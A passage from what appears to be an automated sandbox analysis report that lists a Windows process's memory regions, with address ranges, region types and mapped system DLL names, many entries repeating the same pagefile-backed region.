"c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2472 start_va = 0x320000 end_va = 0x35bfff entry_point = 0x320000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2473 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2474 start_va = 0x9f0000 end_va = 0xcbefff entry_point = 0x9f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2475 start_va = 0x754c0000 end_va = 0x754d6fff entry_point = 0x754c0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2476 start_va = 0x75950000 end_va = 0x7595afff entry_point = 0x75950000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2477 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2478 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2479 start_va = 0x320000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2480 start_va = 0xcc0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 2481 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2482 start_va = 0x360000 end_va = 0x366fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 2483 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2484 start_va = 0xec0000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 2485 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2486 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2487 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2488 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2489 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2490 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2491 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2492 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2493 start_va = 0x3d0000 end_va = 0x3edfff entry_point = 0x3d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2494 start_va = 0x700000 end_va = 0x887fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2495 start_va = 0x3d0000 end_va = 0x3edfff entry_point = 0x3d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2496 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2497 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2498 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2499 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2500 start_va = 0x12c0000 end_va = 0x1440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Region: id = 2501 start_va = 0x1450000 end_va = 0x284ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001450000" filename = "" Region: id = 2502 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2503 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2504 start_va = 0x2850000 end_va = 0x2c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 2505 start_va = 0x2c60000 end_va = 0x306ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 2506 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2507 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2508 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2509 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2510 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2511 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2512 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2513 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2514 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2515 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2516 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2517 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2518 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2519 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2520 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2521 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2522 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2523 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2524 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2525 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2526 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2527 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2528 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2529 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2530 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2531 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2532 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2533 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2534 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2535 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2578 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2579 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2580 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2581 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2582 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2583 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2584 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2585 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2586 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2587 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2588 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2589 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2590 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2591 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2592 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2593 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2594 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2595 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2596 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2597 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2598 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2599 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2600 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2601 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2602 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2603 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2604 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2605 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2606 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2607 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2608 start_va = 0x2850000 end_va = 0x2c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 2609 start_va = 0x2c60000 end_va = 0x306ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 2610 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2611 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2612 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2613 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2614 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2615 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2616 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2617 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2618 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2619 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2620 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2621 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2622 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2623 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2624 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2625 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2626 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2627 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2628 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2629 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2630 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2631 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2632 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2633 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2634 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2635 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2636 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2637 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2638 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2639 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2640 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2641 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2642 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2643 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2644 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2645 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2646 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2647 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2648 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2649 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2650 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2651 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2652 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2653 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2654 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2655 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2656 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2657 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2658 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2659 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2660 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2661 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2662 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2663 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2664 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2665 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2666 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2667 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2668 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2669 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2670 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2671 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2672 start_va = 0x2850000 end_va = 0x2c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 2673 start_va = 0x2c60000 end_va = 0x306ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 2674 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2675 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2676 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2677 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2678 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2679 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2680 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2681 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2682 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2683 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2684 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2685 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2686 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2687 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2688 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2689 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2690 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2691 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2692 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2693 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2694 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2695 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2696 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2697 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2698 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2699 start_va = 0x5b0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2700 start_va = 0x5b0000 